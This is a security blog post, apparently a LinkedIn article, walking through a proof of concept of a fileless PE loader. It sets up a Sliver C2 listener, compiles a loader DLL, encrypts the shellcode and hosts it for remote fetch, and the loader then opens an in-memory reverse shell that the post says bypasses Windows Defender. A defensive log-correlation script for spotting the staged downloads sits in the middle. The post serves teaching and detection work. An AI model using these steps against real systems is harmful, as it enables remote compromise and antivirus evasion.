Fileless PELoader: POC Breakdown

In our last blog, we explored the theoretical side of Fileless PELoaders and how they evade traditional defenses. Now, it’s time to get our hands dirty with a Proof of Concept (POC) that demonstrates just how these attacks work in real life.


What You’ll Need

For this POC, we’ll be using publicly available tools to replicate the attack scenario. Below are the required files and their purposes:

  • PELoader (Payload.dll/system.dll): This is the core loader that fetches files from a remote server and loads them into memory. It embeds the remote IP and port, and the paths of the shellcode and key files. (PELoader code sourced from GitHub). Reference:
  • cipher.bin: Encrypted shellcode for reverse communication.
  • key.bin: Key used to decrypt the shellcode.


Steps to Reproduce

1. Setting Up Sliver

  • Boot up Sliver (a C2 platform).
  • Start an HTTPS listener: "https"
  • Verify the live listener using the "jobs" command.
  • Generate a payload: "generate --http [IP]"


2. Compiling the Loader DLL

Use the fileless.cpp from the PELoader GitHub repo to create a loader DLL:


x86_64-w64-mingw32-g++ fileless.cpp -lwinhttp -shared --static -o payload.dll


3. Encrypting the Shellcode

Generate encrypted shellcode using the aes.py script:

python aes.py [sliver_payload]


4. Hosting the Files

Start an HTTP server to host the files (Payload.dll, cipher.bin, and key.bin):

python -m http.server 8080


5. Executing the Loader

  • Drop and execute the PELoader file (Payload.dll).
  • Once executed, it fetches the encrypted shellcode (cipher.bin) from the server, decrypts it using key.bin, and loads it directly into memory.


What Happens Next?

Once the shellcode is decrypted and executed in memory, it establishes a reverse shell back to the Sliver C2 server. You can now control the compromised system, demonstrating how attackers leverage fileless techniques to evade detection.
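From the defender's side, the sequence above leaves a network trace even though nothing new is written to disk: one client pulls a DLL and then, within seconds, two small binary blobs from the same staging server. The script below is an added example, not part of the original post or of the PELoader project. It correlates constructed proxy log lines (the log format, the field order and the ".bin" suffix are assumptions) and flags a client that fetched two or more distinct stage files from one server inside a short window, noting whether a DLL came from that server first.

```python
"""Correlate staged-download activity in egress/proxy logs.

Added example for the fileless PELoader write-up. Log format and field
names are assumptions; real proxies differ, so adapt parse_line().
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import urlparse

# Constructed sample lines (timestamp, client, method, url) - not real traffic.
SAMPLE_LOGS = """\
2024-01-10T09:00:01Z 10.0.0.5 GET http://203.0.113.7:8080/Payload.dll
2024-01-10T09:00:03Z 10.0.0.5 GET http://203.0.113.7:8080/cipher.bin
2024-01-10T09:00:03Z 10.0.0.5 GET http://203.0.113.7:8080/key.bin
2024-01-10T09:05:00Z 10.0.0.9 GET http://203.0.113.7:8080/index.html
2024-01-10T09:06:10Z 10.0.0.12 GET http://198.51.100.4/cipher.bin
2024-01-10T11:00:00Z 10.0.0.12 GET http://198.51.100.4/key.bin
"""

LOG_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+)$")
WINDOW = timedelta(seconds=60)       # assumed: stage files arrive together
STAGE_SUFFIXES = (".bin",)           # assumed: encrypted blob + key, as in the POC


def parse_line(line):
    """Parse one assumed-format log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    ts, client, _method, url = m.groups()
    u = urlparse(url)
    return {
        "ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
        "client": client,
        "server": u.netloc,
        "path": u.path,
    }


def find_staged_loads(log_text, window=WINDOW):
    """Return one alert per (client, server) pair that pulled two or more
    distinct stage files within `window`; dll_seen records whether the same
    server also served a DLL to that client."""
    stage_hits = defaultdict(list)
    dll_seen = set()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        key = (rec["client"], rec["server"])
        path = rec["path"].lower()
        if path.endswith(".dll"):
            dll_seen.add(key)
        elif path.endswith(STAGE_SUFFIXES):
            stage_hits[key].append(rec)

    alerts = []
    for key, recs in stage_hits.items():
        recs.sort(key=lambda r: r["ts"])
        for i, first in enumerate(recs):
            names = {first["path"].rsplit("/", 1)[-1]}
            for later in recs[i + 1:]:
                if later["ts"] - first["ts"] > window:
                    break
                names.add(later["path"].rsplit("/", 1)[-1])
            if len(names) >= 2:
                alerts.append({
                    "client": key[0],
                    "server": key[1],
                    "files": sorted(names),
                    "dll_seen": key in dll_seen,
                })
                break  # one alert per pair is enough for triage
    return alerts


if __name__ == "__main__":
    for alert in find_staged_loads(SAMPLE_LOGS):
        print(alert)
```

The POC names its stages cipher.bin and key.bin, but nothing forces an operator to keep those names, so the rule keys on the shape of the traffic (two distinct small binaries from one server in quick succession, optionally preceded by a DLL) rather than on the file names. Pair it with host telemetry: the loader is linked against winhttp, so an unexpected process making outbound HTTP right after a DLL load is the matching endpoint signal.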


Want to See It in Action?

Reference:


Disclaimer: This video is created solely for educational purposes and demonstrates a controlled setup within my local lab environment. The content highlights the successful implementation of a reverse shell, showcasing how security mechanisms like Windows Defender can be bypassed in a fully updated Windows environment. The intent of this video is to raise awareness about potential vulnerabilities, helping security professionals and organizations strengthen their defenses against similar techniques.

Important Notes: The techniques shown are conducted in a strictly isolated and authorized testing environment. I do not condone or encourage any form of unauthorized or malicious use of this information. Misuse of such knowledge for illegal activities is a violation of laws and ethical standards and is punishable under cybersecurity legislation. This content is intended for ethical hackers, penetration testers, and security professionals to understand the importance of robust security measures and to improve detection and response strategies.

Saugata Datta

Manager Threat Ops @ Sophos | ITIL Foundation, EC-Council Certified Security Analyst, GIAC Certified Forensic Analyst, MBA Data Science | SOC Advisor

3 months

Amazing, very well written mama!
